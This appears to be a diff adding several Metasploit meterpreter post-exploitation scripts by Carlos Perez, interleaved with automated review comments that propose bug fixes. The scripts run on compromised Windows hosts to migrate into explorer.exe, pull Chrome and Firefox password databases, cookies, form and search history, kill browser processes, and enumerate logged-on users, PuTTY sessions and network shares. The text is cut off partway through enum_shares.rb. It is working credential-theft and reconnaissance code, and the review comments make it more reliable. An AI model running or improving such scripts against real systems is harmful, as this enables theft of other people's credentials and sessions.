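+    print_status("no files found for user '#{username}'")
+    return false
+  end
+
+  @chrome_files.map{ |e| e[:in_file] }.uniq.each do |f|
+    remote_path = chrome_path + '\\' + f
+    local_path = File.join(@log_dir, Rex::FileUtils.clean_path(username), f)
+    print_status("downloading file #{f} to '#{local_path}'...")
+    client.fs.file.download_file(local_path, remote_path)
+  end
+  return true
+end
+
+if @migrate
+  current_pid = client.sys.process.open.pid
+  target_pid = client.sys.process["explorer.exe"]
+  if target_pid != current_pid
+    @old_pid = current_pid
+    print_status("current PID is #{current_pid}. migrating into explorer.exe, PID=#{target_pid}...")
+    client.core.migrate(target_pid)
+    print_status("done.")
+  end
+end
+
+host = session.session_host
+@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
+::FileUtils.mkdir_p(@log_dir)
+
+sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
+os = @host_info['OS']
+if os =~ /(Windows 7|2008|Vista)/
+  @profiles_path = sysdrive + "\\Users\\"
+  @data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
+elsif os =~ /(2000|NET|XP)/
+  @profiles_path = sysdrive + "\\Documents and Settings\\"
+  @data_path = "\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default"
+end
+
+usernames = []
+
+uid = client.sys.config.getuid
+
+if is_system?
+  print_status "running as SYSTEM, extracting user list..."
+  print_status "(decryption of passwords and credit card numbers will not be possible)"
+  client.fs.dir.foreach(@profiles_path) do |u|
+    usernames << u if u !~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
+  end
+  print_status "users found: #{usernames.join(", ")}"
+else
+  print_status "running as user '#{uid}'..."
+  usernames << client.sys.config.getenv('USERNAME')
+  prepare_railgun
+end
+
+usernames.each do |u|
+  print_status("extracting data for user '#{u}'...")
+  success = extract_data(u)
+  process_files(u) if success
+end
+
+if @migrate && @old_pid
+  print_status("migrating back into PID=#{@old_pid}...")
+  client.core.migrate(@old_pid)
+  print_status("done.")
+end
+
+raise Rex::Script::Completed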
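Review bot: write_output's yaml branch serialises with `JSON.pretty_generate(rows)` and writes the result to the `.yml` file, so `-f yaml` silently produces JSON, and when the earlier `require 'json'` failed the branch raises NameError on the JSON constant; since `yaml` is required at the top of the file, the line should be `::File.open(file + ".yml", "w") { |f| f.write(rows.to_yaml) }`. In process_files the SQLite3::Database is closed only on the happy path, so a query that fails on an unexpected schema leaks the handle; wrapping `execute2` in `begin`/`ensure db.close end` keeps that tidy. decrypt_data allocates a fixed 1024 bytes and then writes the whole blob into it, so a field longer than that overruns the allocation; sizing the allocation from `data.length` is the safe form. The OS branch at the bottom leaves `@profiles_path` nil for any release it does not name, and extract_data then fails with NoMethodError on `nil + "\\"`; an explicit `else` that reports the unsupported OS and raises Rex::Script::Completed would make that failure legible.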

+ 292
- 0
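--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -0,0 +1,292 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
+#-------------------------------------------------------------------------------
+################## Variable Declarations ##################
+require 'sqlite3'
+@client = client
+kill_frfx = false
+host,port = session.session_host, session.session_port
+# Create Filename info to be appended to downloaded files
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+# Create a directory for the logs
+@logs = ::File.join(Msf::Config.config_directory, 'logs',"scripts", 'enum_firefox', host + filenameinfo )
+
+# logfile name
+logfile = @logs + "/" + host + filenameinfo + ".txt"
+notusrs = [
+  "Default",
+  "Default User",
+  "Public",
+  "LocalService",
+  "NetworkService",
+  "All Users"
+]
+#-------------------------------------------------------------------------------
+#Function for getting Firefox SQLite DB's
+def frfxplacesget(path,usrnm)
+  # Create the log
+  ::FileUtils.mkdir_p(@logs)
+  @client.fs.dir.foreach(path) {|x|
+    next if x =~ /^(\.|\.\.)$/
+    fullpath = path + '\\' + x
+    if @client.fs.file.stat(fullpath).directory?
+      frfxplacesget(fullpath,usrnm)
+    elsif fullpath =~ /(formhistory.sqlite|cookies.sqlite|places.sqlite|search.sqlite)/i
+      dst = x
+      dst = @logs + ::File::Separator + usrnm + dst
+      print_status("\tDownloading Firefox Database file #{x} to '#{dst}'")
+      @client.fs.file.download_file(dst, fullpath)
+    end
+  }
+
+end
+#-------------------------------------------------------------------------------
+#Function for processing the Firefox sqlite DB's
+def frfxdmp(usrnm)
+  sitesvisited = []
+  dnldsmade = []
+  bkmrks = []
+  cookies = []
+  formvals = ''
+  searches = ''
+  results = ''
+  placesdb = @logs + ::File::Separator + usrnm + "places.sqlite"
+  formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite"
+  searchdb = @logs + ::File::Separator + usrnm + "search.sqlite"
+  cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite"
+  bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt"
+  download_list = @logs + ::File::Separator + usrnm + "_download_list.txt"
+  url_history = @logs + ::File::Separator + usrnm + "_history.txt"
+  form_history = @logs + ::File::Separator + usrnm + "_form_history.txt"
+  search_history = @logs + ::File::Separator + usrnm + "_search_history.txt"
+  begin
+    print_status("\tGetting Firefox Bookmarks for #{usrnm}")
+    db = SQLite3::Database.new(placesdb)
+    #print_status("\tProcessing #{placesdb}")
+
+    db.execute('select a.url from moz_places a, moz_bookmarks b, '+
+      'moz_bookmarks_roots c where a.id=b.fk and parent=2'+
+      ' and folder_id=2 and a.hidden=0') do |row|
+      bkmrks << row
+    end
+    print_status("\tSaving to #{bookmarks}")
+    if bkmrks.length != 0
+      bkmrks.each do |b|
+        file_local_write(bookmarks,"\t#{b.to_s}\n")
+      end
+    else
+      print_status("\tIt appears that there are no bookmarks for this account")
+    end
+  rescue::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
+  #--------------------------------------------------------------------------
+  begin
+    print_status("\tGetting list of Downloads using Firefox made by #{usrnm}")
+    db.execute('SELECT url FROM moz_places, moz_historyvisits ' +
+      'WHERE moz_places.id = moz_historyvisits.place_id '+
+      'AND visit_type = "7" ORDER by visit_date') do |row|
+      dnldsmade << row
+    end
+    print_status("\tSaving Download list to #{download_list}")
+    if dnldsmade.length != 0
+      dnldsmade.each do |d|
+        file_local_write(download_list,"\t#{d.to_s} \n")
+      end
+    else
+      print_status("\tIt appears that downloads where cleared for this account")
+    end
+  rescue::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
+  #--------------------------------------------------------------------------
+  begin
+    print_status("\tGetting Firefox URL History for #{usrnm}")
+    db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' +
+      'WHERE moz_places.id = moz_historyvisits.place_id ' +
+      'AND visit_type = "1" ORDER by visit_date' ) do |row|
+      sitesvisited << row
+    end
+    print_status("\tSaving URL History to #{url_history}")
+    if sitesvisited.length != 0
+      sitesvisited.each do |s|
+        file_local_write(url_history,"\t#{s.to_s}\n")
+      end
+    else
+      print_status("\tIt appears that Browser History has been cleared")
+    end
+    db.close
+  rescue::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
+  #--------------------------------------------------------------------------
+  begin
+    print_status("\tGetting Firefox Form History for #{usrnm}")
+    db = SQLite3::Database.new(formdb)
+    #print_status("\tProcessing #{formdb}")
+    db.execute("SELECT fieldname,value FROM moz_formhistory") do |row|
+      formvals << "\tField: #{row[0]} Value: #{row[1]}\n"
+    end
+    print_status("\tSaving Firefox Form History to #{form_history}")
+    if formvals.length != 0
+      file_local_write(form_history,formvals)
+    else
+      print_status("\tIt appears that Form History has been cleared")
+    end
+    db.close
+  rescue::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
+
+  begin
+    print_status("\tGetting Firefox Search History for #{usrnm}")
+    db = SQLite3::Database.new(searchdb)
+    #print_status("\tProcessing #{searchdb}")
+    db.execute("SELECT name,value FROM engine_data") do |row|
+      searches << "\tField: #{row[0]} Value: #{row[1]}\n"
+    end
+    print_status("\tSaving Firefox Search History to #{search_history}")
+    if searches.length != 0
+      file_local_write(search_history,searches)
+    else
+      print_status("\tIt appears that Search History has been cleared")
+    end
+    db.close
+  rescue::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
+  # Create Directory for dumping Firefox cookies
+  ckfldr = ::File.join(@logs,"firefoxcookies_#{usrnm}")
+  ::FileUtils.mkdir_p(ckfldr)
+  db = SQLite3::Database.new(cookiesdb)
+  db.results_as_hash = true
+  print_status("\tGetting Firefox Cookies for #{usrnm}")
+  db.execute("SELECT * FROM moz_cookies;" ) do |item|
+    fd = ::File.new(ckfldr + ::File::Separator + item['id'].to_s + "_" + item['host'].to_s + ".txt", "w+")
+    fd.puts "Name: " + item['name'] + "\n"
+    fd.puts "Value: " + item['value'].to_s + "\n"
+    fd.puts "Host: " + item['host'] + "\n"
+    fd.puts "Path: " + item['path'] + "\n"
+    fd.puts "Expiry: " + item['expiry'].to_s + "\n"
+    fd.puts "lastAccessed: " + item['lastAccessed'].to_s + "\n"
+    fd.puts "isSecure: " + item['isSecure'].to_s + "\n"
+    fd.puts "isHttpOnly: " + item['isHttpOnly'].to_s + "\n"
+    fd.close
+  end
+  return results
+end
+#-------------------------------------------------------------------------------
+#Function for getting password files
+def frfxpswd(path,usrnm)
+  @client.fs.dir.foreach(path) {|x|
+    next if x =~ /^(\.|\.\.)$/
+    fullpath = path + '\\' + x
+
+    if @client.fs.file.stat(fullpath).directory?
+      frfxpswd(fullpath,usrnm)
+    elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
+      begin
+        dst = x
+        dst = @logs + ::File::Separator + usrnm + dst
+        print_status("\tDownloading Firefox Password file to '#{dst}'")
+        @client.fs.file.download_file(dst, fullpath)
+      rescue
+        print_error("\t******Failed to download file #{x}******")
+        print_error("\t******Browser could be running******")
+      end
+    end
+  }
+
+end
+#-------------------------------------------------------------------------------
+# Function for checking if Firefox is installed
+def frfxchk
+  found = false
+  registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall").each do |a|
+    if a =~ /Firefox/
+      print_status("Firefox was found on this system.")
+      found = true
+    end
+  end
+  return found
+end
+#-------------------------------------------------------------------------------
+#Function for executing all pilfering actions for Firefox
+def frfxpilfer(frfoxdbloc,session,logs,usrnm,logfile)
+  print_status("Getting Firefox information for user #{usrnm}")
+  frfxplacesget(frfoxdbloc,usrnm)
+  frfxpswd(frfoxdbloc,usrnm)
+  file_local_write(logfile,frfxdmp(usrnm))
+end
+
+# Function to kill Firefox if open
+def kill_firefox
+  print_status("Killing the Firefox Process if open...")
+  @client.sys.process.get_processes().each do |x|
+    if x['name'].downcase == "firefox.exe"
+      print_status("\tFirefox Process found #{x['name']} #{x['pid']}")
+      print_status("\tKilling process .....")
+      session.sys.process.kill(x['pid'])
+    end
+  end
+end
+####################### Options ###########################
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ],
+  "-k" => [ false, "Kill Firefox processes before downloading databases for enumeration."]
+
+)
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for extracting Firefox Browser."
+    print_line(@@exec_opts.usage)
+    raise Rex::Script::Completed
+  when "-k"
+    kill_frfx = true
+  end
+}
+if client.platform =~ /win32|win64/
+  if frfxchk
+    user = @client.sys.config.getuid
+    if not is_system?
+      envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
+      usrname = envs['USERNAME']
+      db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
+      if kill_frfx
+        kill_firefox
+      end
+      print_status("Extracting Firefox data for user #{usrname}")
+      frfxpswd(db_path,usrname)
+      frfxplacesget(db_path,usrname)
+      frfxdmp(usrname)
+    else
+      registry_enumkeys("HKU").each do |sid|
+        if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
+          key_base = "HKU\\#{sid}"
+          usrname = Rex::FileUtils.clean_path(registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME"))
+          db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
+          if kill_frfx
+            kill_firefox
+          end
+          print_status("Extracting Firefox data for user #{usrname}")
+          frfxpswd(db_path,usrname)
+          frfxplacesget(db_path,usrname)
+          frfxdmp(usrname)
+        end
+      end
+    end
+
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end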
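Review bot: In the non-SYSTEM branch the user name that is spliced into local output paths comes straight from the target's environment (`usrname = envs['USERNAME']`), whereas the SYSTEM branch wraps the equivalent registry value in `Rex::FileUtils.clean_path`; because `frfxplacesget`, `frfxpswd` and `frfxdmp` all concatenate `usrnm` into file names under `@logs`, an unexpected value supplied by the compromised host decides where the operator's own machine writes. Apply the same sanitisation on that line, `usrname = Rex::FileUtils.clean_path(envs['USERNAME'])`. The `rescue::Exception => e` clauses in `frfxdmp` also swallow `SignalException` and `SystemExit`; `rescue ::StandardError => e` keeps the error logging while letting interrupts through, and the cookie loop at the end of `frfxdmp` has no rescue at all, so a nil `name`/`host` column raises a `TypeError` out of the script with `fd` still open (a block form `::File.open(..., "w+") do |fd|` would close it). `frfxpilfer` is defined but never called and can be dropped.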

+ 101
- 0
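--- a/scripts/meterpreter/enum_logged_on_users.rb
+++ b/scripts/meterpreter/enum_logged_on_users.rb
@@ -0,0 +1,101 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
+#-------------------------------------------------------------------------------
+################## Variable Declarations ##################
+@client = client
+#-------------------------------------------------------------------------------
+
+######################## Functions ########################
+def ls_logged
+  sids = []
+  sids << registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList")
+  tbl = Rex::Text::Table.new(
+      'Header'  => "Logged Users",
+      'Indent'  => 1,
+      'Columns' =>
+        [
+          "SID",
+          "Profile Path"
+        ])
+  sids.flatten.each do |sid|
+    profile_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\#{sid}","ProfileImagePath")
+    tbl << [sid,profile_path]
+  end
+  print_line("\n" + tbl.to_s + "\n")
+end
+
+def ls_current
+  key_base, username = "",""
+  tbl = Rex::Text::Table.new(
+      'Header'  => "Current Logged Users",
+      'Indent'  => 1,
+      'Columns' =>
+        [
+          "SID",
+          "User"
+        ])
+  registry_enumkeys("HKU").each do |sid|
+    case sid
+    when "S-1-5-18"
+      username = "SYSTEM"
+      tbl << [sid,username]
+    when "S-1-5-19"
+      username = "Local Service"
+      tbl << [sid,username]
+    when "S-1-5-20"
+      username = "Network Service"
+      tbl << [sid,username]
+    else
+      if sid =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
+      key_base = "HKU\\#{sid}"
+      os = @client.sys.config.sysinfo['OS']
+      if os =~ /(Windows 7|2008|Vista)/
+        username = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
+      elsif os =~ /(2000|NET|XP)/
+        appdata_var = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA")
+        username = ''
+        if appdata_var =~ /^\w\:\D*\\(\D*)\\\D*$/
+          username = $1
+        end
+      end
+      tbl << [sid,username]
+      end
+    end
+  end
+  print_line("\n" + tbl.to_s + "\n")
+end
+#-------------------------------------------------------------------------------
+####################### Options ###########################
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ],
+  "-l" => [ false, "List SID's of users who have loged in to the host." ],
+  "-c" => [ false, "List SID's of currently loged on users." ]
+  )
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
+    print_line(@@exec_opts.usage)
+    raise Rex::Script::Completed
+  when "-l"
+    ls_logged
+  when "-c"
+    ls_current
+  end
+}
+if client.platform =~ /win32|win64/
+  if args.length == 0
+    print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
+    print_line(@@exec_opts.usage)
+    raise Rex::Script::Completed
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end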
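Review bot: In `ls_current` the 2000/XP branch derives the user name from the `APPDATA` path with `/^\w\:\D*\\(\D*)\\\D*$/`, and the `\D*` groups reject any digit, so an account such as `user1` is listed with an empty User column; reading `USERNAME` from `Volatile Environment` in both branches, as the Vista/7 branch already does, avoids the parse entirely (or at least capture with `([^\\]+)`). The `-l` and `-c` handlers run inside `@@exec_opts.parse(args)`, which sits above the `client.platform` check, so on a non-Windows session `ls_logged`/`ls_current` reach the registry calls before the unsupported-platform message is ever printed; moving the platform check above the parse call matches the other scripts in this commit. `@@exec_opts` is a class variable, which Ruby binds to the lexical class rather than the object evaluating the script, so it looks like every script using that name shares one value (enum_firefox.rb and enum_powershell_env.rb do the same); an instance variable such as the `@opts` in file_collector.rb is the safer form.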

+ 132
- 0
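--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -0,0 +1,132 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#Meterpreter script for enumerating Microsoft Powershell settings.
+#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
+@client = client
+
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false,"Help menu." ]
+)
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
+    print_line("USAGE: run enum_scripting_env")
+    print_line(@@exec_opts.usage)
+    raise Rex::Script::Completed
+  end
+}
+#Support Functions
+#-------------------------------------------------------------------------------
+def enum_users
+  os = @client.sys.config.sysinfo['OS']
+  users = []
+  user = @client.sys.config.getuid
+  path4users = ""
+  sysdrv = @client.sys.config.getenv('SystemDrive')
+
+  if os =~ /Windows 7|Vista|2008/
+    path4users = sysdrv + "\\Users\\"
+    profilepath = "\\Documents\\WindowsPowerShell\\"
+  else
+    path4users = sysdrv + "\\Documents and Settings\\"
+    profilepath = "\\My Documents\\WindowsPowerShell\\"
+  end
+
+  if is_system?
+    print_status("Running as SYSTEM extracting user list..")
+    @client.fs.dir.foreach(path4users) do |u|
+      userinfo = {}
+      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
+      userinfo['username'] = u
+      userinfo['userappdata'] = path4users + u + profilepath
+      users << userinfo
+    end
+  else
+    userinfo = {}
+    uservar = @client.sys.config.getenv('USERNAME')
+    userinfo['username'] = uservar
+    userinfo['userappdata'] = path4users + uservar + profilepath
+    users << userinfo
+  end
+  return users
+end
+
+
+
+#-------------------------------------------------------------------------------
+def enum_powershell
+  #Check if PowerShell is Installed
+  if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
+    print_status("Powershell is Installed on this system.")
+    powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
+    print_status("Version: #{powershell_version}")
+    #Get PowerShell Execution Policy
+    begin
+      powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
+    rescue
+      powershell_policy = "Restricted"
+    end
+    print_status("Execution Policy: #{powershell_policy}")
+    powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
+    print_status("Path: #{powershell_path}")
+    if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
+      print_status("Powershell Snap-Ins:")
+      registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
+        print_status("\tSnap-In: #{si}")
+        registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
+          print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
+        end
+      end
+    else
+      print_status("No PowerShell Snap-Ins are installed")
+
+    end
+    if powershell_version =~ /2./
+      print_status("Powershell Modules:")
+      powershell_module_path = @client.sys.config.getenv('PSModulePath')
+      @client.fs.dir.foreach(powershell_module_path) do |m|
+        next if m =~ /^(\.|\.\.)$/
+        print_status("\t#{m}")
+      end
+    end
+    tmpout = []
+    print_status("Checking if users have Powershell profiles")
+    enum_users.each do |u|
+      print_status("Checking #{u['username']}")
+      begin
+      @client.fs.dir.foreach(u["userappdata"]) do |p|
+        next if p =~ /^(\.|\.\.)$/
+        if p =~ /Microsoft.PowerShell_profile.ps1/
+          ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
+          until ps_profile.eof?
+            tmpout << ps_profile.read
+          end
+          ps_profile.close
+          if tmpout.length == 1
+            print_status("Profile for #{u["username"]} not empty, it contains:")
+            tmpout.each do |l|
+              print_status("\t#{l.strip}")
+            end
+          end
+        end
+      end
+      rescue
+      end
+    end
+
+
+  end
+end
+if client.platform =~ /win32|win64/
+  enum_powershell
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end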
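Review bot: `tmpout` in `enum_powershell` is created once before `enum_users.each` and never cleared, and a profile is only reported when `tmpout.length == 1`, so a profile read in more than one chunk is silently skipped, and once the first profile has been collected the count can never be 1 again and no later user's profile is printed. Move `tmpout = []` inside the per-user loop and replace the length test with `unless tmpout.empty?` (printing `tmpout.join.each_line`) so the check is per user and independent of chunk size. The bare `rescue` with an empty body around the directory walk hides every error, including the filesystem ones that would explain a missing result; at least `rescue => e` with `print_error("#{u['username']}: #{e}")`. The version test `powershell_version =~ /2./` has an unescaped dot and so also matches values such as `20`; `/^2\./` is what is meant. The `-h` text refers to `enum_scripting_env`, which does not match this script's file name.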

+ 104
- 0
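--- a/scripts/meterpreter/enum_putty.rb
+++ b/scripts/meterpreter/enum_putty.rb
@@ -0,0 +1,104 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+#
+# Meterpreter script for enumerating putty connections
+# Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
+#
+@client = client
+#Options and Option Parsing
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ]
+)
+
+opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for enumerating Putty Configuration."
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+  end
+}
+
+def hkcu_base
+  key_base = []
+
+  if not is_system?
+    key_base << "HKCU"
+  else
+    key = "HKU\\"
+    root_key, base_key = @client.sys.registry.splitkey(key)
+    open_key = @client.sys.registry.open_key(root_key, base_key)
+    keys = open_key.enum_key
+    keys.each do |k|
+      if k =~ /S-1-5-21-\d*-\d*-\d*-\d*$/
+        key_base << "HKU\\#{k}"
+      end
+    end
+  end
+  return key_base
+end
+def check_putty(reg_key_base)
+  installed = false
+  app_list = []
+  app_list = registry_enumkeys("#{reg_key_base}\\Software")
+  os = @client.sys.config.sysinfo['OS']
+  if os =~ /(Windows 7|2008|Vista)/
+    username_profile = registry_getvaldata("#{reg_key_base}\\Volatile Environment","USERNAME")
+  elsif os =~ /(2000|NET|XP)/
+    appdata_var = registry_getvaldata("#{reg_key_base}\\Volatile Environment","APPDATA")
+    username_profile = appdata_var.scan(/^\w\:\D*\\(\D*)\\\D*$/)
+  end
+  if app_list.index("SimonTatham")
+    print_status("Putty Installed for #{username_profile}")
+    installed = true
+  end
+  return installed
+end
+
+def enum_known_ssh_hosts(reg_key_base)
+  print_status("Saved SSH Server Public Keys:")
+  registry_enumvals("#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\SshHostKeys").each do |host|
+    print_status("\t#{host}")
+  end
+end
+
+def enum_saved_sessions(reg_key_base)
+  saved_sessions = []
+  sessions_protocol = ""
+  sessions_key = "#{reg_key_base}\\Software\\SimonTatham\\PuTTY\\Sessions"
+  saved_sessions = registry_enumkeys(sessions_key)
+  if saved_sessions.length > 0
+    saved_sessions.each do |saved_session|
+      print_status("Session #{saved_session}:")
+      sessions_protocol = registry_getvaldata(sessions_key+"\\"+saved_session,"Protocol")
+      if sessions_protocol =~ /ssh/
+        print_status("\tProtocol: SSH")
+        print_status("\tHostname: #{registry_getvaldata(sessions_key+"\\"+saved_session,"HostName")}")
+        print_status("\tUsername: #{registry_getvaldata(sessions_key+"\\"+saved_session,"UserName")}")
+        print_status("\tPublic Key: #{registry_getvaldata(sessions_key+"\\"+saved_session,"PublicKeyFile")}")
+      elsif sessions_protocol =~ /serial/
+        print_status("\tProtocol: Serial")
+        print_status("\tSerial Port: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialLine")}")
+        print_status("\tSpeed: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialSpeed")}")
+        print_status("\tData Bits: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialDataBits")}")
+        print_status("\tFlow Control: #{registry_getvaldata(sessions_key+"\\"+saved_session,"SerialFlowControl")}")
+      end
+    end
+  end
+end
+if client.platform =~ /win32|win64/
+  hkcu_base.each do |hkb|
+    if check_putty(hkb)
+      enum_known_ssh_hosts(hkb)
+      enum_saved_sessions(hkb)
+    end
+  end
+else
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end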
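Review bot: `check_putty`, `enum_known_ssh_hosts` and `enum_saved_sessions` call `.index`, `.each` and `.length` on the result of `registry_enumkeys`/`registry_enumvals` with no nil guard; `get_application_list.rb` in the same commit tests `if soft_keys` after `registry_enumkeys`, which suggests a missing key yields nil, in which case a profile without PuTTY (or without an `SshHostKeys` key) aborts the whole script with `NoMethodError` instead of moving on to the next SID. Wrapping each lookup as `Array(registry_enumkeys(...))` keeps the loops working on an empty result. In the 2000/XP branch of `check_putty`, `username_profile = appdata_var.scan(...)` stores the nested array that `String#scan` returns for a capture group, so the status line prints something like `[["name"]]`; `appdata_var[/^\w\:\D*\\(\D*)\\\D*$/, 1]` yields the string, and note the `\D*` groups reject user names containing digits, as in enum_logged_on_users.rb.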

+ 124
- 0
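--- a/scripts/meterpreter/enum_shares.rb
+++ b/scripts/meterpreter/enum_shares.rb
@@ -0,0 +1,124 @@
+##
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
+# If you'd like to imporve this script, please try to port it as a post
+# module instead. Thank you.
+##
+
+
+
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
+#-------------------------------------------------------------------------------
+################## Variable Declarations ##################
+opts = Rex::Parser::Arguments.new(
+  "-h" => [ false, "Help menu." ]
+  )
+
+opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-h"
+    print_line "Meterpreter Script for Enumerating Shares Offered, History of Mounted Shares,"
+    print_line "History of UNC Paths entered in Run Dialog."
+    print_line(opts.usage)
+    raise Rex::Script::Completed
+  end
+}
+
+# Function for enumerating recent mapped drives on target machine
+def enum_recent_mounts(base_key)
+  recent_mounts = []
+  partial_path = base_key + '\Software\\Microsoft\Windows\CurrentVersion\Explorer'
+  full_path = "#{partial_path}\\Map Network Drive MRU"
+  explorer_keys = registry_enumkeys(partial_path)
+  if explorer_keys.include?("Map Network Drive MRU")
+    registry_enumvals(full_path).each do |k|
+      if not k =~ /MRUList/
+        recent_mounts << registry_getvaldata(full_path,k)
+      end
+    end
+  end
+  return recent_mounts
+end
+
+# Function for enumerating UNC Paths entered in run dialog box
+def enum_run_unc(base_key)
+  unc_paths = []
+  full_path = base_key + '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'
+  registry_enumvals(full_path).each do |k|
+    if k =~ /./
+      run_entrie = registry_getvaldata(full_path,k)
+      unc_paths << run_entrie if run_entrie =~ /^\\\\/
+    end
+  end
+  return unc_paths
+end
+
+def enum_conf_shares()
+  target_os = client.sys.config.sysinfo['OS']
+  if target_os =~ /Windows 7|Vista|2008/
+    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares'
+  else
+    shares_key = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\lanmanserver\\Shares'
+  end
+  shares = registry_enumvals(shares_key)
+  if shares.length > 0
+    print_status()
+    print_status("The following shares where found:")
+    shares.each do |s|
+      share_info = registry_getvaldata(shares_key,s).split("\000")
+      print_status("\tName: #{s}")
+      share_info.each do |e|
+        name,val = e.split("=")
+        print_status("\t#{name}: #{val}") if name =~ /Path|Type/
+      end
+      print_status()
+    end
+  end
+end
+
+if client.platform =~ /win32|64/
+  # Variables to hold info
+  mount_history = []
+  run_history = []
+
+  # Enumerate shares being offered
+  enum_conf_shares()
+
+  if not is_system?
+    mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
+    run_history = enum_run_unc("HKEY_CURRENT_USER")
+  else
+    user_sid = []
+    key = "HKU\\"
+    root_key, base_key = client.sys.registry.splitkey(key)
+    open_key = client.sys.registry.open_key(root_key, base_key)
+    keys = open_key.enum_key
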